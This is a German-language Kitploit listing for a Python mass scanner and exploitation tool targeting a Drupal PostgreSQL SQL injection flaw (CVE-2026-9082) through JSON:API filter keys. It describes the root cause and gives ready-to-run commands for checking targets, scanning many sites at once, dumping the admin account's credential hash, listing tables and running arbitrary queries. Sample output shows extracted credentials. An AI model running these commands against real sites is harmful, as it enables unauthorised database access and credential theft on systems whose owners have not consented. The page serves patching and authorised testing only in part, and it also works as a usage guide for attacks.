Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
drupal-jsonapi-sqli-scanner — Scanner: CVE-2026-9082 Drupal PostgreSQL SQLi über JSON:API — Python-Scanner für nicht authentifizierte SQLi, die zu RCE führt (CISA KEV) | Kitploit
Tools/GitHubGitHub/ridhinva/drupal-jsonapi-sqli-scanner
SchwachstellenscannerExploitationWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffungPenetrationstestsRed TeamingDatenbanksicherheit
GitHub
ridhinva/drupal-jsonapi-sqli-scanner

drupal-jsonapi-sqli-scanner

Scanner: CVE-2026-9082 Drupal PostgreSQL SQLi über JSON:API — Python-Scanner für nicht authentifizierte SQLi, die zu RCE führt (CISA KEV)

Repository anzeigen
216vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-9082 Critical CISA KEV Affected Versions License

CVE-2026-9082 — Drupal-PostgreSQL-SQL-Injection

Massen-Scanner- & Exploitation-Tool

Nicht authentifizierte SQL-Injection im Drupal Core (PostgreSQL)
JSON:API-Filter-Array-Key-Injection durch Missbrauch von PDO-Platzhalternamen


Übersicht

CVE-2026-9082 ist eine hochkritische SQL-Injection-Schwachstelle im Drupal Core, die alle PostgreSQL-basierten Websites betrifft, die Drupal 8.0 bis 11.3.9 verwenden. Sie wurde am 2026-05-22 in den CISA-Katalog bekannter ausgenutzter Schwachstellen (KEV) aufgenommen — und wird aktiv in freier Wildbahn ausgenutzt.

Auswirkungen

SchweregradCVSSAuthentifizierung erforderlichAngriffsvektor
Kritisch9.8+KeineHTTP (JSON:API)
  • Datenexfiltration — Datenbanken, Benutzer und Passwort-Hashes extrahieren
  • Rechteausweitung — Admin-Konten erstellen, Inhalte verändern
  • Remote-Code-Ausführung — in einigen Konfigurationen über pg_exec() oder COPY ... PROGRAM

Betroffene Versionen

StatusVersionen
❌ AnfälligDrupal 8.0.0 → 11.3.9 (PostgreSQL-Backend)
✅ Behoben11.3.10, 11.2.12, 10.6.9, 10.5.10

So funktioniert es

Der Fehler befindet sich in core/modules/pgsql/src/EntityQuery/Condition.php. Die Methode translateCondition() verwendet vom Benutzer kontrollierte Array-Keys aus den JSON:API-Filterparametern, um PDO-Platzhalternamen zu konstruieren. PDO parst nur [a-zA-Z0-9_] als Platzhalternamen, sodass jedes Suffix nach ) als wörtliches SQL in die Abfrage injiziert wird.

root@kitploit:~
JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection

Funktionen

  • ✅ Massen-Scanner — scannt Hunderte von Zielen gleichzeitig
  • ✅ Einzelziel-Modus — prüft einzelne Drupal-Websites
  • ✅ Zeitbasierte Erkennung — Bestätigung von Blind-SQLi per pg_sleep()
  • ✅ Boolesche Erkennung — Vergleich der Zeilenanzahl
  • ✅ Versionsermittlung — PostgreSQL-Version identifizieren
  • ✅ Datenbankinformationen — aktuellen Benutzer und Datenbanknamen extrahieren
  • ✅ Auslesen von Admin-Zugangsdaten — Benutzername, E-Mail, Passwort-Hash (uid=1)
  • ✅ Tabellenliste — alle öffentlichen Tabellen aufzählen
  • ✅ Benutzerdefinierte SQL-Abfragen — beliebige Extraktionsabfragen ausführen
  • ✅ Proxy-Unterstützung — Routing über Burp Suite oder Ähnliches
  • ✅ Ausgabe in Datei — Ergebnisse von Massen-Scans speichern
  • ✅ Farbige Terminalausgabe — Ergebnisse leicht lesbar

Installation

Voraussetzungen

  • Python 3.8+
  • pip (Python-Paketmanager)

Abhängigkeiten installieren

root@kitploit:~
# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082

# Install requirements
pip install requests

Das war's! Nur eine Abhängigkeit — requests.


Verwendung

🕵️ Einzelziel prüfen

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check

📡 Massen-Scan mehrerer Ziele

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt

targets.txt-Format:

root@kitploit:~
https://target1.com
target2.com
192.168.1.100

🔓 PostgreSQL-Version extrahieren

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --version

🗄️ Datenbankinformationen extrahieren

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo

👤 Admin-Zugangsdaten auslesen (uid=1)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --admin

📋 Alle Tabellen auflisten

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --tables

💉 Benutzerdefinierte SQL-Abfrage

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"

Ergebnisse in Datei speichern

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt

Proxy verwenden (Burp Suite)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080

Timing anpassen

root@kitploit:~
# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10

# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60

Befehlsreferenz

FlagBeschreibung
-u, --urlURL eines einzelnen Ziels
-f, --fileDatei mit Zielen (eines pro Zeile)
-o, --outputScan-Ergebnisse in Datei speichern
--checkPrüfen, ob das Ziel anfällig ist
--versionPostgreSQL-Version extrahieren
--dbinfoDB-Benutzer und Datenbanknamen extrahieren
--adminDrupal-Admin-Zugangsdaten extrahieren (uid=1)
--tablesAlle Datenbanktabellen auflisten
--queryBenutzerdefinierte SQL-Extraktionsabfrage
--threadsThreads für den Massen-Scan (Standard: 20)
--timeoutHTTP-Request-Timeout (Standard: 30s)
--delaypg_sleep-Verzögerung für die Erkennung (Standard: 5s)
--no-ssl-verifyTLS-Zertifikatsprüfung überspringen
--proxyHTTP-Proxy (z. B. http://127.0.0.1:8080)

Beispielausgabe

Anfälliges Ziel

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║          CVE-2026-9082 - Drupal PostgreSQL SQLi             ║
║       Mass Scanner + Exploitation Tool v1.0.0               ║
╚══════════════════════════════════════════════════════════════╝
  CISA KEV: Added 2026-05-22  |  Advisory: SA-CORE-2026-004

[*] Checking: https://vulnerable-drupal-site.com

[!!] VULNERABLE - https://vulnerable-drupal-site.com
      Method: time-based (+5.2s)
      Resource: node/article

Ausgabe der Admin-Zugangsdaten

root@kitploit:~
[+] username: admin
[+] email: [email protected]
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...

Referenzen

QuelleLink
Drupal-AdvisorySA-CORE-2026-004
CISA KEVCVE-2026-9082
Patch-Commitea9524d9
NVD-EintragCVE-2026-9082
EntdeckerMichael Maturi

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich autorisierten Sicherheitstests, Bildungszwecken und ethischer Forschung.

Unbefugter Zugriff auf Computersysteme ist illegal. Die Autoren übernehmen keine Haftung und sind nicht für Missbrauch oder Schäden verantwortlich, die durch dieses Programm verursacht werden.


Autor

Ridhin V A (@ridhinva) — Bug-Bounty-Jäger & Sicherheitsforscher

Erstellt, weil CISA KEV sagt, dass es in freier Wildbahn ausgenutzt wird. Patchen Sie Ihre Drupal-Websites.

Tool herunterladen